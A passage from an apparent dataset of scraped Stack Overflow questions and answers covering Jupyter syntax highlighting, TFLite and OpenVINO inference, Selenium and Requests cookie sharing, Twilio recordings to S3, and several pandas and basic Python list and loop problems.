0\nres['count']=res.merge(countDates, on='date', how='left').fillna(0)['c1']\n\n" ]
[ 2, 1 ]
[]
[]
[ "dataframe", "datetime", "pandas", "python" ]
stackoverflow_0074574705_dataframe_datetime_pandas_python.txt
Q: How to change syntax highlighting in Jupyter Notebook? a = np.array([1,4,3]) b = np.array([2,-1,5]) a@b df['A'].fillna(value=df['A'].mean()) df.fillna(value=df.mean()) For teaching purposes: I need to apply a special color in Jupyter Notebook for coding to differentiate them from variables: a, b: black by default, ok 1,4,3: Green by default, ok @: Purple by default, ok np.array( ): black >>> need to change it to a different color (blue). 'A': red by default, ok df[ ]: black by default, ok .fillna(value=: black >>> need to change it to a different color (blue). .mean(): black >>> need to change it to a different color (blue). A: As far as I can tell, the Jupyter rendering of python code formatting within a python code cell relies on specific CSS styles. so: pd.DataFrame(...) pd has a CSS style cm.variable (cmstands for codemirror) DataFrame has a CSS style cm.property So the Jupyter notebook sees pd.DataFrame, it only sees variable.property. see picture: python: 3.10.7 (tags/v3.10.7:6cc6b13, Sep 5 2022, 14:08:36) [MSC v.1933 64 bit (AMD64)] jupyterlab==3.5.0 ipython==8.6.0 This seems to indicate there is no distinction between class attributes, class methods, class properties, module attributes etc... I think it is because the python code is parsed and styled within the HTML rendering. Here is where the magic occurs <server>/static/notebook/js/notebook/js/codemirror-ipython.js and here: <server>/static/notebook/js/components/codemirror/ (and child dir/files (<server>/static/notebook/js/components/codemirror/mode/python/python.js )) You will find all the parsing code there, which seem to only treat the code present inside an (HTML) cell. From what I see, there is little to no indication that the JS code is able to go down the imports/callgraphs to determine the precise nature of code tokens like an IDE would (say PyCharm). sample: var wordOperators = wordRegexp(["and", "or", "not", "is"]); var commonKeywords = ["as", "assert", "break", "class", "continue", "def", "del", "elif", "else", "except", "finally", "for", "from", "global", "if", "import", "lambda", "pass", "raise", "return", "try", "while", "with", "yield", "in"]; var commonBuiltins = ["abs", "all", "any", "bin", "bool", "bytearray", "callable", "chr", "classmethod", "compile", "complex", "delattr", "dict", "dir", "divmod", "enumerate", "eval", //... Maybe we can see things this way : a Jupyter notebook is not really an IDE, it may be better seen as an HTTP page that sends string to a python console : page sends print('foo'), (interactive) console does something roughly equivalent of python -c "print('foo')" and some glue gets the results and sends it back to HTML. Unless: someone points to the precise configuration parameter for Jupyter server pages that I could not find and/or Jupyter dev teams add a better parsing capability for HTML rendering, OP desire seems impossible to achieve. You may be able to change color styles to a custom one, but not enhance the parsing capability on the HTML notebook rendering side to be more precise. But, within a specialized IDE that has supports for notebooks (say PyCharm pro (see https://www.jetbrains.com/help/pycharm/jupyter-notebook-support.html#tool-windows which shows advanced debugging capability, which makes me think I'm right :)) or VS code (ref needed)), maybe things can be different since the IDE can have a visibility on the whole python install/modules codebase and has access to its specialized code parsing and rendering engine (which in this case basically replaces what the Jupyter JavaScript code does !). For teaching purposes I think an actual specialized IDE is the go-to tool for such precise syntax highlighting for emphasis on the nature of each code tokens. see PyCharm config for function calls: where the style is inherited from: (of course you can set your own global defaults or language specific defaults ... that depends on the IDE)
How to change syntax highlighting in Jupyter Notebook?
a = np.array([1,4,3]) b = np.array([2,-1,5]) a@b df['A'].fillna(value=df['A'].mean()) df.fillna(value=df.mean()) For teaching purposes: I need to apply a special color in Jupyter Notebook for coding to differentiate them from variables: a, b: black by default, ok 1,4,3: Green by default, ok @: Purple by default, ok np.array( ): black >>> need to change it to a different color (blue). 'A': red by default, ok df[ ]: black by default, ok .fillna(value=: black >>> need to change it to a different color (blue). .mean(): black >>> need to change it to a different color (blue).
[ "As far as I can tell, the Jupyter rendering of python code formatting within a python code cell relies on specific CSS styles.\nso:\npd.DataFrame(...)\n\npd has a CSS style cm.variable (cmstands for codemirror)\nDataFrame has a CSS style cm.property\nSo the Jupyter notebook sees pd.DataFrame, it only sees variable.property.\nsee picture:\n\npython: 3.10.7 (tags/v3.10.7:6cc6b13, Sep 5 2022, 14:08:36) [MSC v.1933 64 bit (AMD64)]\njupyterlab==3.5.0\nipython==8.6.0\n\nThis seems to indicate there is no distinction between class attributes, class methods, class properties, module attributes etc...\nI think it is because the python code is parsed and styled within the HTML rendering.\nHere is where the magic occurs\n<server>/static/notebook/js/notebook/js/codemirror-ipython.js\nand here:\n<server>/static/notebook/js/components/codemirror/ (and child dir/files (<server>/static/notebook/js/components/codemirror/mode/python/python.js ))\nYou will find all the parsing code there, which seem to only treat the code present inside an (HTML) cell. From what I see, there is little to no indication that the JS code is able to go down the imports/callgraphs to determine the precise nature of code tokens like an IDE would (say PyCharm).\nsample:\n var wordOperators = wordRegexp([\"and\", \"or\", \"not\", \"is\"]);\n var commonKeywords = [\"as\", \"assert\", \"break\", \"class\", \"continue\",\n \"def\", \"del\", \"elif\", \"else\", \"except\", \"finally\",\n \"for\", \"from\", \"global\", \"if\", \"import\",\n \"lambda\", \"pass\", \"raise\", \"return\",\n \"try\", \"while\", \"with\", \"yield\", \"in\"];\n var commonBuiltins = [\"abs\", \"all\", \"any\", \"bin\", \"bool\", \"bytearray\", \"callable\", \"chr\",\n \"classmethod\", \"compile\", \"complex\", \"delattr\", \"dict\", \"dir\", \"divmod\",\n \"enumerate\", \"eval\",\n//...\n\nMaybe we can see things this way : a Jupyter notebook is not really an IDE, it may be better seen as an HTTP page that sends string to a python console : page sends print('foo'), (interactive) console does something roughly equivalent of python -c \"print('foo')\" and some glue gets the results and sends it back to HTML.\nUnless:\n\nsomeone points to the precise configuration parameter for Jupyter server pages that I could not find\nand/or Jupyter dev teams add a better parsing capability for HTML rendering,\n\nOP desire seems impossible to achieve.\nYou may be able to change color styles to a custom one, but not enhance the parsing capability on the HTML notebook rendering side to be more precise.\nBut, within a specialized IDE that has supports for notebooks (say PyCharm pro (see https://www.jetbrains.com/help/pycharm/jupyter-notebook-support.html#tool-windows which shows advanced debugging capability, which makes me think I'm right :)) or VS code (ref needed)), maybe things can be different since the IDE can have a visibility on the whole python install/modules codebase and has access to its specialized code parsing and rendering engine (which in this case basically replaces what the Jupyter JavaScript code does !).\n\n\nFor teaching purposes\n\nI think an actual specialized IDE is the go-to tool for such precise syntax highlighting for emphasis on the nature of each code tokens.\nsee PyCharm config for function calls:\n\nwhere the style is inherited from:\n\n(of course you can set your own global defaults or language specific defaults ... that depends on the IDE)\n" ]
[ 1 ]
[]
[]
[ "jupyter_notebook", "python", "syntax_highlighting" ]
stackoverflow_0052877167_jupyter_notebook_python_syntax_highlighting.txt
Q: Tensorflow lite model inference is very slow compared to keras h5 model (VGG16 pretrained) Tensorflow lite predictions are extremely slow compared to keras (h5) model. The behavior is similar between Colab and also on Windows 10 system. I converted the standard VGG16 model to tflite both with and without optimization (converter.optimizations = [tf.lite.Optimize.DEFAULT]) Here are the results I got: Keras model (540MB) prediction time: 0.14 seconds tflite without optimization (540MB) prediction time: 0.5 seconds tflite with optimization (135MB) prediction time: 39 seconds Am I missing something here? Isn't tflite supposed to be optimized for speed? Would the behavior be different on Raspberry Pi or other 'lighter' devices? Link to the code on colab A: TensorFlow Lite isn't optimized for desktop/server, so its not surprising that it performs badly for most models in those environments. TFLite's optimized kernels (including lot of their GEMM operations) are especially geared for mobile CPUs (which don't have the same instruction set as desktop CPUs IIUC). Standard TensorFlow is better for your use-case. A: I agree with Sachin. TFLite's intended use is mobile devices. However, if you need faster inference on a desktop or server you can try OpenVINO. OpenVINO is optimized for Intel hardware, but it should work with any CPU. It optimizes your model by converting to Intermediate Representation (IR), performing graph pruning and fusing some operations into others while preserving accuracy. Then it uses vectorization in runtime. It's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets are below. Install OpenVINO The easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case. pip install openvino-dev[tensorflow2] Save your model as SavedModel OpenVINO is not able to convert the HDF5 model, so you have to save it as SavedModel first. import tensorflow as tf from custom_layer import CustomLayer model = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer}) tf.saved_model.save(model, 'model') Use Model Optimizer to convert SavedModel model The Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). Run in the command line: mo --saved_model_dir "model" --data_type FP32 --output_dir "model_ir" Run the inference The converted model can be loaded by the runtime and compiled for a specific device, e.g., CPU or GPU (integrated into your CPU like Intel HD Graphics). I suggest using an AUTO device. It will choose the best hardware for you. Moreover, if you care about latency, provide that performance hint (as shown below). If you depend on throughput, use THROUGHPUT or CUMULATIVE_THROUGHPUT instead. # Load the network ie = Core() model_ir = ie.read_model(model="model_ir/model.xml") compiled_model_ir = ie.compile_model(model=model_ir, device_name="AUTO", config={"PERFORMANCE_HINT":"LATENCY"}) # Get output layer output_layer_ir = compiled_model_ir.output(0) # Run inference on the input image result = compiled_model_ir([input_image])[output_layer_ir] Disclaimer: I work on OpenVINO.
Tensorflow lite model inference is very slow compared to keras h5 model (VGG16 pretrained)
Tensorflow lite predictions are extremely slow compared to keras (h5) model. The behavior is similar between Colab and also on Windows 10 system. I converted the standard VGG16 model to tflite both with and without optimization (converter.optimizations = [tf.lite.Optimize.DEFAULT]) Here are the results I got: Keras model (540MB) prediction time: 0.14 seconds tflite without optimization (540MB) prediction time: 0.5 seconds tflite with optimization (135MB) prediction time: 39 seconds Am I missing something here? Isn't tflite supposed to be optimized for speed? Would the behavior be different on Raspberry Pi or other 'lighter' devices? Link to the code on colab
[ "TensorFlow Lite isn't optimized for desktop/server, so its not surprising that it performs badly for most models in those environments. TFLite's optimized kernels (including lot of their GEMM operations) are especially geared for mobile CPUs (which don't have the same instruction set as desktop CPUs IIUC).\nStandard TensorFlow is better for your use-case.\n", "I agree with Sachin. TFLite's intended use is mobile devices.\nHowever, if you need faster inference on a desktop or server you can try OpenVINO. OpenVINO is optimized for Intel hardware, but it should work with any CPU. It optimizes your model by converting to Intermediate Representation (IR), performing graph pruning and fusing some operations into others while preserving accuracy. Then it uses vectorization in runtime.\nIt's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets are below.\nInstall OpenVINO\nThe easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case.\npip install openvino-dev[tensorflow2]\n\nSave your model as SavedModel\nOpenVINO is not able to convert the HDF5 model, so you have to save it as SavedModel first.\nimport tensorflow as tf\nfrom custom_layer import CustomLayer\nmodel = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer})\ntf.saved_model.save(model, 'model')\n\nUse Model Optimizer to convert SavedModel model\nThe Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). Run in the command line:\nmo --saved_model_dir \"model\" --data_type FP32 --output_dir \"model_ir\"\n\nRun the inference\nThe converted model can be loaded by the runtime and compiled for a specific device, e.g., CPU or GPU (integrated into your CPU like Intel HD Graphics). I suggest using an AUTO device. It will choose the best hardware for you. Moreover, if you care about latency, provide that performance hint (as shown below). If you depend on throughput, use THROUGHPUT or CUMULATIVE_THROUGHPUT instead.\n# Load the network\nie = Core()\nmodel_ir = ie.read_model(model=\"model_ir/model.xml\")\ncompiled_model_ir = ie.compile_model(model=model_ir, device_name=\"AUTO\", config={\"PERFORMANCE_HINT\":\"LATENCY\"})\n\n# Get output layer\noutput_layer_ir = compiled_model_ir.output(0)\n\n# Run inference on the input image\nresult = compiled_model_ir([input_image])[output_layer_ir]\n\nDisclaimer: I work on OpenVINO.\n" ]
[ 0, 0 ]
[]
[]
[ "keras", "python", "tensorflow" ]
stackoverflow_0066912736_keras_python_tensorflow.txt
Q: Logging in with Selenium then submitting requests with Python Requests gives error 401 I have the following code to log in to a website with Selenium, then submit a request with Requests. I can't easily stick to just requests or just Selenium for this project. I need both. Selenium successfully logs in, but Requests gives an error 401 with any requests I submit. The Requests code was generated by Insomnia, and it works fine if I pass through cookies from my browser after manually logging in. I'm not sure what I need to do to get this to work. Any help is appreciated! import selenium from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.webdriver.support.wait import WebDriverWait import requests webdriver = selenium.webdriver.Firefox() session = requests.Session() webdriver.get("example.website") email_field = WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.ID, "username-field"))) email_field.send_keys("username") password_field = WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.ID, "password-field"))) password_field.send_keys("password") WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, "login-button"))).click() WebDriverWait(webdriver, 10).until(EC.url_matches("loggedin.url")) for cookie in webdriver.get_cookies(): session.cookies.set(cookie['name'], cookie['value']) webdriver.close() url = "url.for/request" headers = { "authority": "authority.url", "accept": "application/json, text/plain, */*", "accept-language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7,en-GB;q=0.6", "content-type": "application/json", "referer": "referal.url", "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "Linux", "sec-fetch-dest": "empty", "sec-fetch-mode": "cors", "sec-fetch-site": "same-origin", "user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" } response = session.request("GET", url, headers=headers) print(response.text) A: My solution to this problem has been to use the selenium requests package rather than selenium. This allows you to authenticate using selenium and then use that same webdriver object to send requests to specific APIs. I never found the root cause for trying to re-use the cookies from selenium with a different session, but I suspect the issue was the original authentication knew the webdriver or session being authenticated, so when you switch your authentication token is no longer valid.
Logging in with Selenium then submitting requests with Python Requests gives error 401
I have the following code to log in to a website with Selenium, then submit a request with Requests. I can't easily stick to just requests or just Selenium for this project. I need both. Selenium successfully logs in, but Requests gives an error 401 with any requests I submit. The Requests code was generated by Insomnia, and it works fine if I pass through cookies from my browser after manually logging in. I'm not sure what I need to do to get this to work. Any help is appreciated! import selenium from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium.webdriver.support.wait import WebDriverWait import requests webdriver = selenium.webdriver.Firefox() session = requests.Session() webdriver.get("example.website") email_field = WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.ID, "username-field"))) email_field.send_keys("username") password_field = WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.ID, "password-field"))) password_field.send_keys("password") WebDriverWait(webdriver, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, "login-button"))).click() WebDriverWait(webdriver, 10).until(EC.url_matches("loggedin.url")) for cookie in webdriver.get_cookies(): session.cookies.set(cookie['name'], cookie['value']) webdriver.close() url = "url.for/request" headers = { "authority": "authority.url", "accept": "application/json, text/plain, */*", "accept-language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7,en-GB;q=0.6", "content-type": "application/json", "referer": "referal.url", "sec-ch-ua-mobile": "?0", "sec-ch-ua-platform": "Linux", "sec-fetch-dest": "empty", "sec-fetch-mode": "cors", "sec-fetch-site": "same-origin", "user-agent": "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" } response = session.request("GET", url, headers=headers) print(response.text)
[ "My solution to this problem has been to use the selenium requests package rather than selenium. This allows you to authenticate using selenium and then use that same webdriver object to send requests to specific APIs.\nI never found the root cause for trying to re-use the cookies from selenium with a different session, but I suspect the issue was the original authentication knew the webdriver or session being authenticated, so when you switch your authentication token is no longer valid.\n" ]
[ 0 ]
[]
[]
[ "python", "python_requests", "selenium", "selenium_webdriver" ]
stackoverflow_0073930512_python_python_requests_selenium_selenium_webdriver.txt
Q: Dealing with Nested For Loops Hello I was wondering if there is an easier and cleaner way of dealing with nested for loops. lst = [['a','b','c','d','e','f','g'],['h','i','j','k','l','m','n','o','p'], ['q','r','s','t','u','v']] path = ['c:\Data_1','c:\Data_2','c:\Data_3'] channel = ['Wholesale','Retail'] category = ['ALL','APPAREL','FOOTWEAR','ACCESSORIES','BAGS'] metric = ['DB','DD','DF','CPT'] for l,p in zip(lst,path): for b in l: #pulls the individual brand by sector sportswear luxury and fashion for c in channel: for a in category: for m in metric: print(b,c,a,m) df = Pricing.loc[(Pricing.brand==b)&(Pricing.channel==c)&(Pricing.el_department==a)] df = df[['observation_date','geography','currency','brand','channel','el_department',m]] df = df.pivot('observation_date','geography',m).reset_index() df['observation_date'] = pd.to_datetime(df['observation_date'],utc=False).dt.date df.sort_values(by='observation_date',ascending=True,inplace=True) A: You can use list comprehension instead of multiple for loop: Here is the example: for l,p in zip(lst,path): result_list = [(b, c, a, m) for b in l for c in channel for a in category for m in metric] print(result_list) Hope it will be helpful :)
Dealing with Nested For Loops
Hello I was wondering if there is an easier and cleaner way of dealing with nested for loops. lst = [['a','b','c','d','e','f','g'],['h','i','j','k','l','m','n','o','p'], ['q','r','s','t','u','v']] path = ['c:\Data_1','c:\Data_2','c:\Data_3'] channel = ['Wholesale','Retail'] category = ['ALL','APPAREL','FOOTWEAR','ACCESSORIES','BAGS'] metric = ['DB','DD','DF','CPT'] for l,p in zip(lst,path): for b in l: #pulls the individual brand by sector sportswear luxury and fashion for c in channel: for a in category: for m in metric: print(b,c,a,m) df = Pricing.loc[(Pricing.brand==b)&(Pricing.channel==c)&(Pricing.el_department==a)] df = df[['observation_date','geography','currency','brand','channel','el_department',m]] df = df.pivot('observation_date','geography',m).reset_index() df['observation_date'] = pd.to_datetime(df['observation_date'],utc=False).dt.date df.sort_values(by='observation_date',ascending=True,inplace=True)
[ "You can use list comprehension instead of multiple for loop:\nHere is the example:\nfor l,p in zip(lst,path): \n result_list = [(b, c, a, m) for b in l for c in channel for a in category for m in metric]\n print(result_list)\n\nHope it will be helpful :)\n" ]
[ 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074559522_pandas_python.txt
Q: How to integrate Twilio's Voice API service with AWS S3 Storage? I'm trying to create a short program that calls a user's number and records the conversation using Twilio and send the recording to an S3 bucket Here's a link that does it to a dropbox instead of an S3: https://www.twilio.com/blog/recording-saving-outbound-voice-calls-python-twilio-dropbox Here's the code I have so far that allows me to call and recorded conversations go to Twilio's online storage: call = client.calls.create( record=True, url='http://demo.twilio.com/docs/voice.xml', to='+15558889988', from_='+18889992222' ) print(call.sid) A: Twillio has inbuilt mechanism to do it, any specific use case you want to do it. https://www.twilio.com/blog/announcing-external-aws-s3-storage-support-for-voice-recordings A: When you create the call you can also create a webhook that tells you when the recording is ready. When you then receive the webhook you can get the file and send it to S3. ... record=True, recording_status_callback=callbackURL+"/recordings", recording_status_callback_event=["completed"], ...
How to integrate Twilio's Voice API service with AWS S3 Storage?
I'm trying to create a short program that calls a user's number and records the conversation using Twilio and send the recording to an S3 bucket Here's a link that does it to a dropbox instead of an S3: https://www.twilio.com/blog/recording-saving-outbound-voice-calls-python-twilio-dropbox Here's the code I have so far that allows me to call and recorded conversations go to Twilio's online storage: call = client.calls.create( record=True, url='http://demo.twilio.com/docs/voice.xml', to='+15558889988', from_='+18889992222' ) print(call.sid)
[ "Twillio has inbuilt mechanism to do it, any specific use case you want to do it. https://www.twilio.com/blog/announcing-external-aws-s3-storage-support-for-voice-recordings\n", "When you create the call you can also create a webhook that tells you when the recording is ready. When you then receive the webhook you can get the file and send it to S3.\n...\n record=True,\n recording_status_callback=callbackURL+\"/recordings\",\n recording_status_callback_event=[\"completed\"],\n...\n\n" ]
[ 1, 1 ]
[]
[]
[ "amazon_s3", "amazon_web_services", "flask", "python", "twilio" ]
stackoverflow_0074553752_amazon_s3_amazon_web_services_flask_python_twilio.txt
Q: Function to remove a part of a string before a capital letter in Pandas Series I have a dataframe that includes a column ['locality_name'] with names of villages, towns, cities. Some names are written like "town of Hamilton", some like "Hamilton", some like "city of Hamilton" etc. As such, it's hard to count unique values etc. My goal is to leave the names only. I want to write a function that removes the part of a string till the capital letter and then apply it to my dataframe. That's what I tried: import re def my_slicer(row): """ Returns a string with the name of locality """ return re.sub('ABCDEFGHIKLMNOPQRSTVXYZ','', row['locality_name']) raw_data['locality_name_only'] = raw_data.apply(my_slicer, axis=1) I excpected it to return a new column with the names of places. Instead, nothing changed - ['locality_name_only'] has the same values as in ['locality_name']. A: You can use pandas.Series.str.extract. For the example : ser = pd.Series(["town of Hamilton", "Hamilton", "city of Hamilton"]) ser_2= ser.str.extract("([A-Z][a-z]+-?\w+)") In your case, use : raw_data['locality_name_only'] = raw_data['locality_name'].str.extract("([A-Z][a-z]+-?\w+)") # Output : print(ser_2) 0 0 Hamilton 1 Hamilton 2 Hamilton A: I would use str.replace and phrase the problem as removing all non uppercase words: raw_data["locality_name_only"] = df["locality_name"].str.replace(r'\s*\b[a-z]\w*\s*', ' ', regex=True).str.strip()
Function to remove a part of a string before a capital letter in Pandas Series
I have a dataframe that includes a column ['locality_name'] with names of villages, towns, cities. Some names are written like "town of Hamilton", some like "Hamilton", some like "city of Hamilton" etc. As such, it's hard to count unique values etc. My goal is to leave the names only. I want to write a function that removes the part of a string till the capital letter and then apply it to my dataframe. That's what I tried: import re def my_slicer(row): """ Returns a string with the name of locality """ return re.sub('ABCDEFGHIKLMNOPQRSTVXYZ','', row['locality_name']) raw_data['locality_name_only'] = raw_data.apply(my_slicer, axis=1) I excpected it to return a new column with the names of places. Instead, nothing changed - ['locality_name_only'] has the same values as in ['locality_name'].
[ "You can use pandas.Series.str.extract. For the example :\nser = pd.Series([\"town of Hamilton\", \"Hamilton\", \"city of Hamilton\"])\nser_2= ser.str.extract(\"([A-Z][a-z]+-?\\w+)\")\n\nIn your case, use :\nraw_data['locality_name_only'] = raw_data['locality_name'].str.extract(\"([A-Z][a-z]+-?\\w+)\")\n\n# Output :\nprint(ser_2)\n\n 0\n0 Hamilton\n1 Hamilton\n2 Hamilton\n\n", "I would use str.replace and phrase the problem as removing all non uppercase words:\nraw_data[\"locality_name_only\"] = df[\"locality_name\"].str.replace(r'\\s*\\b[a-z]\\w*\\s*', ' ', regex=True).str.strip()\n\n" ]
[ 0, 0 ]
[]
[]
[ "pandas", "python", "python_re" ]
stackoverflow_0074575151_pandas_python_python_re.txt
Q: Trying to add a sentinel that is not a number (Python) (I am new to Python so forgive me in advance) I have to write a program that calculates the total of integers from 1 to the user input. So if I input 4, it would add 1+2+3+4. I also added an argument that makes a number that is less than 1 print "invalid number". I am stuck on adding a sentinel that is a letter. Thank you value = input("Enter a number or press J to terminate: ") if value < 1: print("Invalid number") else: i = 1 while value > 1: i = i + value value = value - 1 print(i) This is the code that I tried to do: value = input("Enter a number or J to finish: ") if value < 1: print("Invalid number") while value ! = "J": i = float(value) else: i = 1 while value > 1: i = i + value value = value - 1 print(i) value = input("Enter a number or J to finish: ") Error when J or any number is inputted, '<' not supported between instances of 'str' and 'int'. A: Beginning of an answer. value = input("Enter a number or J to finish: ") while value ! = "J": i = float(value) # a placeholder for future code print(value) # There is a lot of possible code to achieve the goal. A: the function input() always stores the input as string data-type so if you give input as 4 means it will consider the 4 as a string not integer now with this in mind now try: value = input("Enter a number or J to finish: ") if value > 1: print("BOTH DATA TYPES ARE SAME ") value = 4 now we are comparing 4 => "string" with 1 => "int", it's not possible to compare "integer" with "string" so the error occurs. if you want to get input as int then use the following int(input("")) I hope it'll be helpful, thank you
Trying to add a sentinel that is not a number (Python)
(I am new to Python so forgive me in advance) I have to write a program that calculates the total of integers from 1 to the user input. So if I input 4, it would add 1+2+3+4. I also added an argument that makes a number that is less than 1 print "invalid number". I am stuck on adding a sentinel that is a letter. Thank you value = input("Enter a number or press J to terminate: ") if value < 1: print("Invalid number") else: i = 1 while value > 1: i = i + value value = value - 1 print(i) This is the code that I tried to do: value = input("Enter a number or J to finish: ") if value < 1: print("Invalid number") while value ! = "J": i = float(value) else: i = 1 while value > 1: i = i + value value = value - 1 print(i) value = input("Enter a number or J to finish: ") Error when J or any number is inputted, '<' not supported between instances of 'str' and 'int'.
[ "Beginning of an answer.\nvalue = input(\"Enter a number or J to finish: \")\nwhile value ! = \"J\":\n i = float(value)\n# a placeholder for future code\nprint(value)\n# There is a lot of possible code to achieve the goal.\n\n", "the function input() always stores the input as string data-type\nso if you give input as 4 means it will consider the 4 as a string not integer\nnow with this in mind now try:\nvalue = input(\"Enter a number or J to finish: \")\nif value > 1:\n print(\"BOTH DATA TYPES ARE SAME \")\n\nvalue = 4\nnow we are comparing 4 => \"string\" with 1 => \"int\", it's not possible to compare \"integer\" with \"string\" so the error occurs.\nif you want to get input as int then use the following int(input(\"\"))\nI hope it'll be helpful, thank you\n" ]
[ 0, 0 ]
[]
[]
[ "if_statement", "python", "sentinel", "while_loop" ]
stackoverflow_0074575127_if_statement_python_sentinel_while_loop.txt
Q: seperate string number ranges in pandas df I have a df which looks like this Type range Mike 10..13|7|8| Ni 3..4 NANA 2|1|6 and desired output should look like this Type range Mike 10 Mike 11 Mike 12 Mike 13 Mike 7 Mike 8 Nico 3 Nico 4 NANA 2 NANA 1 NANA 6 so, Totaling column presenet the multiple values per Type. range values are presnted with two number seperated by two .. and one value (with no range) is presented between two | | A: Assuming that your ranges are inclusive, which I assume because your '3..4' translates to a row with 3 and a row with 4, and assuming that you forgot to put Mike 14 and Mike 15 in your example output, I found the following solution: import pandas as pd def parse_str(s): numbers = [] for v in s.rstrip('|').split('|'): if v.isdigit(): numbers.append(int(v)) else: start, end = v.split('..') numbers.extend(list(range(int(start), int(end)+1))) return pd.Series(numbers) df.index = df['Type'] dfnew = df['range'].apply(parse_str).stack().reset_index(level=0).rename(columns={0: 'range'}) We write a function that parses the string, which means splitting the string by | and converting the numbers to integers if the string is already a number. Otherwise, it's a range so we split again by .. and create a list with all the numbers in the range. In the end, we return a pd.Series containing all the numbers from the string. Then, we apply that function to the column with df['range'].apply and stack the result. To assure we still keep the names, we have to first set it as the index of the dataframe. A: You can do # split by '|' and explode df = df.assign(range=df['range'].str.split('|')).explode('range') # get the range(i, j) if the string has '..' df['range'] = df['range'].apply(lambda r: range(int(r.split('..')[0]), int(r.split('..')[1])) if (len(r.split('..')) == 2) else r) # explode df = df.explode('range') df Type range 0 Mike 10 0 Mike 11 0 Mike 12 0 Mike 13 0 Mike 14 0 Mike 7 0 Mike 8 1 Ni 3 2 NANA 2 2 NANA 1 2 NANA 6
seperate string number ranges in pandas df
I have a df which looks like this Type range Mike 10..13|7|8| Ni 3..4 NANA 2|1|6 and desired output should look like this Type range Mike 10 Mike 11 Mike 12 Mike 13 Mike 7 Mike 8 Nico 3 Nico 4 NANA 2 NANA 1 NANA 6 so, Totaling column presenet the multiple values per Type. range values are presnted with two number seperated by two .. and one value (with no range) is presented between two | |
[ "Assuming that your ranges are inclusive, which I assume because your '3..4' translates to a row with 3 and a row with 4, and assuming that you forgot to put Mike 14 and Mike 15 in your example output, I found the following solution:\nimport pandas as pd\n\ndef parse_str(s):\n numbers = []\n for v in s.rstrip('|').split('|'):\n if v.isdigit():\n numbers.append(int(v))\n else:\n start, end = v.split('..')\n numbers.extend(list(range(int(start), int(end)+1)))\n return pd.Series(numbers)\n\ndf.index = df['Type']\ndfnew = df['range'].apply(parse_str).stack().reset_index(level=0).rename(columns={0: 'range'})\n\nWe write a function that parses the string, which means splitting the string by | and converting the numbers to integers if the string is already a number. Otherwise, it's a range so we split again by .. and create a list with all the numbers in the range. In the end, we return a pd.Series containing all the numbers from the string.\nThen, we apply that function to the column with df['range'].apply and stack the result. To assure we still keep the names, we have to first set it as the index of the dataframe.\n", "You can do\n# split by '|' and explode\ndf = df.assign(range=df['range'].str.split('|')).explode('range')\n\n# get the range(i, j) if the string has '..'\ndf['range'] = df['range'].apply(lambda r: range(int(r.split('..')[0]), int(r.split('..')[1])) if (len(r.split('..')) == 2) else r)\n\n# explode\ndf = df.explode('range')\ndf\n\n Type range\n0 Mike 10\n0 Mike 11\n0 Mike 12\n0 Mike 13\n0 Mike 14\n0 Mike 7\n0 Mike 8\n1 Ni 3\n2 NANA 2\n2 NANA 1\n2 NANA 6\n\n" ]
[ 0, 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074575084_pandas_python.txt
Q: Doing math with numbers in a list i want to be able to add, subtract, divide, multiply etc with integers in a list and in order. I know you can use sum() to add, but i also want to be able to subtract, etc in order... so i tried making a for loop idk if thats the right thing to do, but it doesn't give me the right output and it really confuses me because it really seems like it should work. I was wondering if anyone knows how to fix this or explain why its not giving me the same output as i expected. my_list = [100, 15, 3] for i in my_list: i -= i print(i) # 100 - 15 - 3 = 82 # Wanted output: 82 # Actual output: 0 my_list = [100, 15] for i in my_list: i += i print(i) # 100 + 15 = 115 # Wanted output: 115 # Actual output: 30 A: There are two main issues with your code: i can't be your loop variable and the sum, because it will be overwritten all the time. So make two variables. Your first task is different from the second. The sum is easy: take all the values of the list and add them, so the order is irrelevant. For your subtraction it's different because you have to take the first value and subtract all others, so it's basically +100-15-3, which means that also the order of the values in the list matter. There are more elegant ways to solve it, but for the beginning this should be better to understand. my_list = [100, 15, 3] my_difference = my_list[0] #initialize with the first value of your list my_list_sub = my_list[1:] #make a new list with the remaining numbers for val in my_list_sub: my_difference=my_difference-val print(my_difference) my_list = [100, 15] my_sum = 0 #initialize your sum with 0 for val in my_list: my_sum=my_sum+val print(my_sum) A: As others already pointed out: The "running"/temporary variable is overwritten in every loop. You can try this out with a simple test: for entry in [0, 'a', 13.37]: print(entry) It's always a good idea of trying out what happens in simple cases to learn what is going on. But your idea of solving this with a loop is absolutely fine. If you want to re-use this functionallity later, it is also nice to wrap that in a function. Assume integer values my_values = [100, 50, 123, 51, 124, 121] in the following examples. Lets first tacle the sum. def calculate_sum(values: list) -> int: result = 0 for entry in values: result += entry return result Check that it does what we want with print(calculate_sum(my_values)) print(sum(my_values)) Now difference is 'almost' like summing up, but you want to sum up all values but the first one, and then compute the difference to the first one (a-b-c-d = a-(b+c+d)). Great, that we have already a method for summing up stuff, so we 